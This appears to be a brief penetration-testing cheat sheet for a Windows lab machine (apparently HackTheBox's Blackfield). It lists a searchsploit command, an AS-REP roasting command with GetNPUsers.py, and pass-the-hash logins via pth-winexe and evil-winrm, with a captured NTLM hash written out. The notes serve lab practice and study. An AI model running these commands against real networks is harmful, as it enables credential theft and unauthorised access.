04 Windows Enum & Exploit

ExpolitDB

searchsploit -m 48431
1
searchsploit -m 48431
2
Copied!

User Enum

When you get a possible user list, using the GetNPUsers.py to get the correct user list with the NTML hash. After that, using the command "pth-winexe","evil-winrm" will the NTML hash to log in to the windows system.
1
python3 GetNPUsers.py blackfield.local/ -usersfile profiles.txt -outputfile hash.txt -dc-ip 10.10.10.192 -format john
Copied!
1
# Method 1
2
pth-winexe -U svc_backup%aad3b435b51404eeaad3b435b51404ee:b624dc83a27cc29da11d9bf25efea796 //10.10.10.192 cmd
3
4
# Method 2
5
evil-winrm -U svc_backup -H aad3b435b51404eeaad3b435b51404ee:b624dc83a27cc29da11d9bf25efea796 -i 10.10.10.192
Copied!
Last modified 9mo ago
Copy link